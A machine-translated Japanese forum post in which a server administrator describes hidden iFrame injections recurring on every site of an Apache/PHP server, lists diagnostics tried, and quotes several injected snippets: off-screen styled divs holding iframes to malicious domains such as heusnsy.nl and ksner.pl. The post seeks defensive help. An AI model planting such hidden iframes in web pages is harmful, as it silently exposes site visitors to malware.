数か月前、専用サーバーのすべてのサイトのすべてのページに非表示の iFrame が表示されるようになりました。503 でサイトをメンテナンスのために停止したとき、iFrame はメンテナンスのための停止ページにまだありました。最終的に、ホストは iFrame のソースをブロックしましたが、バックドアは見つかりませんでした。挿入された iFrame は次のように見えますが、難読化するためのスタイル タグとさまざまな URL でラップされています。
iframe src="http://heusnsy.nl/32283947.html..
小規模なサイトを別のホストに移動しましたが、問題はありませんでした。
メイン サイトを同じホスト上の新しい専用サーバーに移動し、サーバーをロックダウンする努力 (ファイアウォール、アクセス制限、ソフトウェア更新、すべてのファイルの検査) にもかかわらず、iFrame が返されました。
設定ファイル、htaccess など、あらゆる場所を探しましたが、見つかりませんでした。
隠された iFrame インジェクションの脆弱性がどこにあるのか、何か考えはありますか?
編集: 詳細は次のとおりです: Apache と PHP を実行している Linux マシン。すべての最新バージョン。挿入されたコードは次のようになります。
<style>.ivx4di91j1 { position:absolute; left:-1418px; top:-1348px} </style> <div class="ivx4di91j1"><iframe src="heusnsy.nl/32283947.html..
更新 : 詳細情報と私たちが学んだことは次のとおりです。
ホスト: Station CentOS Linux 6.3 - Linux 2.6.32-279.5.1.el6.x86_64 on x86_64 / Apache バージョン 2.2.15 - PHP 5.3.3 (cli) (ビルド: 2012 年 7 月 3 日 16:53:21)
サーバー自体は侵害されていません。
(apache/php) を含むすべてのサービスは、システムで利用可能な最新バージョンにアップグレードされます。
アカウント (ftp またはその他) は侵害されませんでした。
マルウェアは、複数の感染サイトで同時に宛先 URL (iframe src=) を変更します。(unmaskparasites.com 提供)
src ターゲットの変更中に、不正または隠しプロセスが実行/実行されていませんでした。
TCPDUMP は、ポート 80 tcp を使用せずにマルウェアのコードを取得しましたが、マルウェアを受信したユーザーからの GET リクエストには異常は見られませんでした。また、対応する apache アクセス ログにも異常は見つかりませんでした。
ウェブサイト ファイルまたは httpd/php バイナリは、iFrame の src url アドレスの切り替え中にまったく変更されませんでした - md5sum チェックのおかげです。
変更中、既知のサービスの既知のポートで不正な接続は行われませんでした。残りはファイアウォールが処理します。
rkhunter と maldet は結果を出しませんでした。
"</script>"マルウェア iFrame は、このサーバー上のすべてのアカウントと Web サイトで、このタグを持つページの最初のタグの直後にトリガーされ、挿入されます。マルウェアは、静的ページやデータベース接続のないサイトに挿入されます。
<head> </script></head>(ページにタグがあれば十分です)不正な apache モジュールや php モジュール (mycript.so を除く) はインストールされていません。デフォルトの Apache モジュールのほとんどは中断され、コメント アウトされています。
マルウェアは常に存在しているわけではありません。それは行ったり来たりし、数時間オフになることもあり、その後数人のユーザーに表示され、再び消えます。追跡が非常に困難になります。
当社のサイトで実行されている 100% の php コードとほとんどの javascript コード (phpmyadmin を除く) はカスタム コードです。そうでないのは、Jquery ライブラリだけです。
サーバーはトラフィックの多いマシンであり、ログの検索/照合は非常に遅いです。1 週間のアクセス ログが 15 GB を超える場合があります。
これが状況です...アカウントの侵害、ファイルのハッキング、不正なスクリプトの問題ではなくなりました。これはこれまでに見たことのないものであり、原因は apache/php 自体のどこかに隠されています。(少なくともこれは私たちが考えていることです)。どんな助けやアイデアも大歓迎です。
iFrame インジェクションの例を次に示します。
<script src="/templates/js/jquery-1.4.2.min.js" type="text/javascript"></script><style>.pw0xxs { position:absolute; left:-1795px; top:-1357px} </ style> <div class="pw0xxs"><iframe src="http://infectedsite.com/84064443.html" width="167" height="332"></iframe></div>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js" type="text/javascript"></script><style>.h3fuonj6 { position:absolute; left :-1012px; top:-1348px} </style> <div class="h3fuonj6"><iframe src="http://infectedsite.com/13334443.html" width="236" height="564"></iframe></div >
</script><style>.exm31sfk8l { position:absolute; left:-1349px; top:-1836px} </style> <div class="exm31sfk8l"><iframe src="http://infectedsite.com/79144443.html" wid th="559" height="135"></iframe></div>
document.write('<style>.exm31sfk8l { position:absolute; left:-1349px; top:-1836px} </style> <div class="exm31sfk8l"><iframe src="http://ksner.pl/79144443.ht ml" width="559" height="135"></iframe></div>');// ColorBox v1.3.19.3 - jQuery lightbox plugin
</script><style>.rv9mlj { position:absolute; left:-1698px; top:-1799px} </style> <div class="rv9mlj"><iframe src="http://infectedsite.com/42054443. html" width="163" height="409"></iframe></div>
<script src="./js/cross_framing_protection.js?ts=1344391602" type="text/javascript"></script><style>.rv9mlj { position:absolute; left:-1698px; top:-1799px} </style> <div class="rv9mlj"><iframe src="http://infectedsite.com/42054443.html" width="163" height="409"></iframe></div>